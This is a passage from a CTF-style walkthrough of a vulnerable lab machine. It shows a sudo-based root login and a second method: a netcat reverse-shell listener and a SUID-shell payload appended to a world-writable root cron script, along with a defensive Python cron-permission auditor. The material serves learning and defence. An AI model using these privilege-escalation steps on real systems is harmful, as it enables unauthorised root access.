The authenticity of host '192.168.1.32 (192.168.1.32)' can't be established.
ECDSA key fingerprint is SHA256:WuY26BwbaoIOawwEIZRaZGve4JZFaRo7iSvLNoCwyfA.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.1.32' (ECDSA) to the list of known hosts.
-----------------------------------------------------------------
~ Barry, don't forget to put a message here ~
-----------------------------------------------------------------
peter@192.168.1.32's password:
Welcome back!
This is the Z Shell configuration function for new users,
zsh-newuser-install.
You are seeing this message because you have no zsh startup files
(the files .zshenv, .zprofile, .zshrc, .zlogin in the directory
~). This function can help you with a few settings that should
make your use of the shell easier.
You can:
(q) Quit and do nothing. The function will be run again next time.
(0) Exit, creating the file ~/.zshrc containing just a comment.
That will prevent this function being run again.
(1) Continue to the main menu.
(2) Populate your ~/.zshrc with the configuration recommended
by the system administrator and exit (you will need to edit
the file by hand, if so desired).
--- Type one of the keys in parentheses ---
Aborting.
The function will be run again next time. To prevent this, execute:
touch ~/.zshrc
red% id
uid=1000(peter) gid=1000(peter) groups=1000(peter),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),113(lpadmin),114(sambashare)
red% sudo -l
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.
[sudo] password for peter:
Matching Defaults entries for peter on red:
lecture=always, env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User peter may run the following commands on red:
(ALL : ALL) ALL
red% sudo su
➜ peter cd /
➜ / cd /root

➜ ~ ls -la
total 208
drwx------ 4 root root 4096 May 15 18:27 .
drwxr-xr-x 22 root root 4096 Jun 7 2016 ..
-rw------- 1 root root 1 Jun 5 2016 .bash_history
-rw-r--r-- 1 root root 3106 Oct 22 2015 .bashrc
-rwxr-xr-x 1 root root 1090 Jun 5 2016 fix-wordpress.sh
-rw-r--r-- 1 root root 463 Jun 5 2016 flag.txt
-rw-r--r-- 1 root root 345 Jun 5 2016 issue
-rw-r--r-- 1 root root 50 Jun 3 2016 .my.cnf
-rw------- 1 root root 1 Jun 5 2016 .mysql_history
drwxr-xr-x 11 root root 4096 Jun 3 2016 .oh-my-zsh
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rwxr-xr-x 1 root root 103 Jun 5 2016 python.sh
-rw------- 1 root root 1024 Jun 5 2016 .rnd
drwxr-xr-x 2 root root 4096 Jun 4 2016 .vim
-rw------- 1 root root 1 Jun 5 2016 .viminfo
-rw-r--r-- 1 root root 54405 Jun 5 2016 wordpress.sql
-rw-r--r-- 1 root root 39206 Jun 3 2016 .zcompdump
-rw-r--r-- 1 root root 39352 Jun 3 2016 .zcompdump-red-5.1.1
-rw------- 1 root root 39 Jun 5 2016 .zsh_history
-rw-r--r-- 1 root root 2839 Jun 3 2016 .zshrc
-rw-r--r-- 1 root root 17 Jun 3 2016 .zsh-update
➜ ~ cat flag.txt
~~~~~~~~~~<(Congratulations)>~~~~~~~~~~
.-'''''-.
|'-----'|
|-.....-|
| |
| |
_,._ | |
__.o` o`"-. | |
.-O o `"-.o O )_,._ | |
( o O o )--.-"`O o"-.`'-----'`
'--------' ( o O o)
`----------`
b6b545dc11b7a270f4bad23432190c75162c4a2b
➜ ~

Privilege Escalation — Method 3

Working through g0tmi1k's Linux privilege escalation checklist, we come across a cron job in /etc/cron.d named logrotate that runs /usr/local/sbin/cron-logrotate.sh as root every 5 minutes. The script is owned by root but its mode is rwxrwxrwx, so any user can append to it and whatever they add runs as root on the next tick. The world-writable bit is the whole problem here; read and execute for everyone would be harmless on their own.

root@kali:~# nc -lvp 443
listening on [any] 443 ...
192.168.1.32: inverse host lookup failed: Unknown host
connect to [192.168.1.28] from (UNKNOWN) [192.168.1.32] 57404
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@red:/var/www/https/blogblog/wp-content/uploads$ cat /etc/cron*
cat /etc/cron*
cat: /etc/cron.d: Is a directory
cat: /etc/cron.daily: Is a directory
cat: /etc/cron.hourly: Is a directory
cat: /etc/cron.monthly: Is a directory
cat: /etc/cron.weekly: Is a directory
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
www-data@red:/var/www/https/blogblog/wp-content/uploads$ cd /etc
www-data@red:/etc$ ls -lah cron*

ls -lah cron*
-rw-r--r-- 1 root root 722 Apr 5 2016 crontab
cron.d:
total 32K
drwxr-xr-x 2 root root 4.0K Jun 3 2016 .
drwxr-xr-x 100 root root 12K May 15 17:54 ..
-rw-r--r-- 1 root root 102 Jun 3 2016 .placeholder
-rw-r--r-- 1 root root 56 Jun 3 2016 logrotate
-rw-r--r-- 1 root root 589 Jul 16 2014 mdadm
-rw-r--r-- 1 root root 670 Mar 1 2016 php
cron.daily:
total 56K
drwxr-xr-x 2 root root 4.0K Jun 3 2016 .
drwxr-xr-x 100 root root 12K May 15 17:54 ..
-rw-r--r-- 1 root root 102 Apr 5 2016 .placeholder
-rwxr-xr-x 1 root root 539 Apr 5 2016 apache2
-rwxr-xr-x 1 root root 376 Mar 31 2016 apport
-rwxr-xr-x 1 root root 920 Apr 5 2016 apt-compat
-rwxr-xr-x 1 root root 1.6K Nov 26 2015 dpkg
-rwxr-xr-x 1 root root 372 May 6 2015 logrotate
-rwxr-xr-x 1 root root 539 Jul 16 2014 mdadm
-rwxr-xr-x 1 root root 249 Nov 12 2015 passwd
-rwxr-xr-x 1 root root 383 Mar 8 2016 samba
-rwxr-xr-x 1 root root 214 Apr 12 2016 update-notifier-common
cron.hourly:
total 20K
drwxr-xr-x 2 root root 4.0K Jun 3 2016 .
drwxr-xr-x 100 root root 12K May 15 17:54 ..
-rw-r--r-- 1 root root 102 Apr 5 2016 .placeholder
cron.monthly:
total 20K
drwxr-xr-x 2 root root 4.0K Jun 3 2016 .
drwxr-xr-x 100 root root 12K May 15 17:54 ..
-rw-r--r-- 1 root root 102 Apr 5 2016 .placeholder
cron.weekly:
total 28K
drwxr-xr-x 2 root root 4.0K Jun 3 2016 .
drwxr-xr-x 100 root root 12K May 15 17:54 ..
-rw-r--r-- 1 root root 102 Apr 5 2016 .placeholder
-rwxr-xr-x 1 root root 86 Apr 13 2016 fstrim
-rwxr-xr-x 1 root root 211 Apr 12 2016 update-notifier-common
www-data@red:/etc$
www-data@red:/etc$ cat cron.d/logrotate

cat cron.d/logrotate
*/5 * * * * root /usr/local/sbin/cron-logrotate.sh
www-data@red:/etc$ ls -la /usr/local/sbin/cron-logrotate.sh
ls -la /usr/local/sbin/cron-logrotate.sh
-rwxrwxrwx 1 root root 130 May 15 19:09 /usr/local/sbin/cron-logrotate.sh
www-data@red:/etc$ cat /usr/local/sbin/cron-logrotate.sh
cat /usr/local/sbin/cron-logrotate.sh
#Simon, you really need to-do something about this
www-data@red:/etc$
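Finding this by hand means cross-referencing every cron entry against file permissions. The following is an added example written for this edit (not the original post's code and not g0tmi1k's checklist): it parses system-crontab lines like those in /etc/crontab and /etc/cron.d, pulls the absolute paths out of each command, and reports any target that is writable by group or other, or that sits in a directory where a non-owner could replace it. To run anywhere it builds a temp tree containing a 0777 cron-logrotate.sh and a 0755 control script, and resolves the crontab's paths relative to that tree instead of the real /.

```python
"""Audit cron jobs for targets a non-root user could modify or replace.

Added example for this walkthrough, not part of the original post. The
crontab text and the scripts it points at are constructed in a temp directory.
"""
import os
import re
import stat
import tempfile

# System crontab job line: schedule (5 fields or @keyword), user, command.
CRON_LINE = re.compile(
    r"^\s*(?P<sched>(?:@\w+)|(?:\S+\s+){5})\s*(?P<user>\S+)\s+(?P<cmd>.+)$"
)
# Absolute paths inside a command; stops at shell metacharacters.
ABS_PATH = re.compile(r"(?<!\S)/[^\s;&|()]+")


def parse_system_crontab(text):
    """Yield (user, command) for each job line; skip comments, blanks and VAR=value lines."""
    for line in text.splitlines():
        if not line.strip() or line.lstrip().startswith("#") or re.match(r"^\s*\w+=", line):
            continue
        m = CRON_LINE.match(line)
        if m:
            yield m.group("user"), m.group("cmd").strip()


def writable_by_others(path):
    """True if the mode grants write to group or other (the rwxrwxrwx case above)."""
    return bool(os.stat(path).st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def dir_allows_replace(path):
    """True if a non-owner could unlink/rename entries: group/other-writable and not sticky."""
    mode = os.stat(path).st_mode
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH)) and not mode & stat.S_ISVTX


def weak_cron_targets(crontab_text, root="/"):
    """Return [(user, cmd, path, reason)] for jobs whose referenced paths are not safe.

    root is prepended to every absolute path so a constructed tree can be audited.
    """
    findings = []
    for user, cmd in parse_system_crontab(crontab_text):
        for tok in ABS_PATH.findall(cmd):
            path = os.path.join(root, tok.lstrip("/"))
            if not os.path.exists(path):
                continue
            if writable_by_others(path):
                findings.append((user, cmd, tok, "target writable by group/other"))
            elif dir_allows_replace(os.path.dirname(path)):
                findings.append((user, cmd, tok, "parent directory allows replacing the target"))
    return findings


def build_sample():
    """Constructed sample: the logrotate job from the box plus a correctly-permissioned job."""
    root = tempfile.mkdtemp(prefix="cronaudit-")
    sbin = os.path.join(root, "usr", "local", "sbin")
    os.makedirs(sbin)
    os.chmod(sbin, 0o755)  # explicit, so the result does not depend on umask
    bad = os.path.join(sbin, "cron-logrotate.sh")
    with open(bad, "w") as fh:
        fh.write("#Simon, you really need to-do something about this\n")
    os.chmod(bad, 0o777)   # the mode seen in the ls -la above
    good = os.path.join(sbin, "backup.sh")
    with open(good, "w") as fh:
        fh.write("#!/bin/sh\ntar czf /var/backups/www.tgz /var/www\n")
    os.chmod(good, 0o755)
    crontab = (
        "SHELL=/bin/sh\n"
        "PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n"
        "# m h dom mon dow user command\n"
        "*/5 * * * * root /usr/local/sbin/cron-logrotate.sh\n"
        "0 2 * * * root /usr/local/sbin/backup.sh\n"
    )
    return root, crontab


if __name__ == "__main__":
    sample_root, sample_crontab = build_sample()
    for user, cmd, path, reason in weak_cron_targets(sample_crontab, root=sample_root):
        print(f"[{user}] {cmd}\n    {path}: {reason}")
```

On a real host feed it the contents of /etc/crontab and each file in /etc/cron.d with the default root="/"; a path in the report that is also owned by root is exactly the logrotate case, since root will execute whatever the writable file contains.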

Append a line that copies a shell into /tmp and sets the SUID bit on it. Because cron runs the script as root, the copy is created owned by root already; the chown is just belt and braces. Once the bit is set, running the copy gives a shell with root's effective UID.

www-data@red:/etc$ echo "cp /bin/dash /tmp/exploit; chmod u+s /tmp/exploit; chown root:root /tmp/exploit" >> /usr/local/sbin/cron-logrotate.sh
www-data@red:/etc$ cat /usr/local/sbin/cron-logrotate.sh
cat /usr/local/sbin/cron-logrotate.sh
#Simon, you really need to-do something about this
cp /bin/dash /tmp/exploit; chmod u+s /tmp/exploit; chown root:root /tmp/exploit

Wait for the next five-minute cron run, then execute the SUID copy with -p so dash keeps the elevated effective UID instead of dropping back to the real one.

www-data@red:/$ /tmp/exploit -p
/tmp/exploit -p
# cd /root
cd /root
# ls -la
ls -la
total 208
drwx------ 4 root root 4096 May 15 19:02 .
drwxr-xr-x 22 root root 4096 Jun 7 2016 ..
-rw------- 1 root root 1 Jun 5 2016 .bash_history
-rw-r--r-- 1 root root 3106 Oct 22 2015 .bashrc
-rw-r--r-- 1 root root 50 Jun 3 2016 .my.cnf
-rw------- 1 root root 1 Jun 5 2016 .mysql_history
drwxr-xr-x 11 root root 4096 Jun 3 2016 .oh-my-zsh
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw------- 1 root root 1024 Jun 5 2016 .rnd
drwxr-xr-x 2 root root 4096 Jun 4 2016 .vim
-rw------- 1 root root 1 Jun 5 2016 .viminfo
-rw-r--r-- 1 root root 39206 Jun 3 2016 .zcompdump
-rw-r--r-- 1 root root 39352 Jun 3 2016 .zcompdump-red-5.1.1
-rw-r--r-- 1 root root 17 Jun 3 2016 .zsh-update
-rw------- 1 root root 39 Jun 5 2016 .zsh_history
-rw-r--r-- 1 root root 2839 Jun 3 2016 .zshrc
-rwxr-xr-x 1 root root 1090 Jun 5 2016 fix-wordpress.sh
-rw-r--r-- 1 root root 463 Jun 5 2016 flag.txt
-rw-r--r-- 1 root root 345 Jun 5 2016 issue
-rwxr-xr-x 1 root root 103 Jun 5 2016 python.sh
-rw-r--r-- 1 root root 54405 Jun 5 2016 wordpress.sql
# cat flag.txt
cat flag.txt
~~~~~~~~~~<(Congratulations)>~~~~~~~~~~
.-'''''-.
|'-----'|
|-.....-|
| |
| |
_,._ | |
__.o` o`"-. | |
.-O o `"-.o O )_,._ | |
( o O o )--.-"`O o"-.`'-----'`
'--------' ( o O o)
`----------`
b6b545dc11b7a270f4bad23432190c75162c4a2b

#

I know this was a very detailed post. I just wanted to cover all the aspects of enumeration, privilege escalation and obtaining root.

Happy Hacking !!!
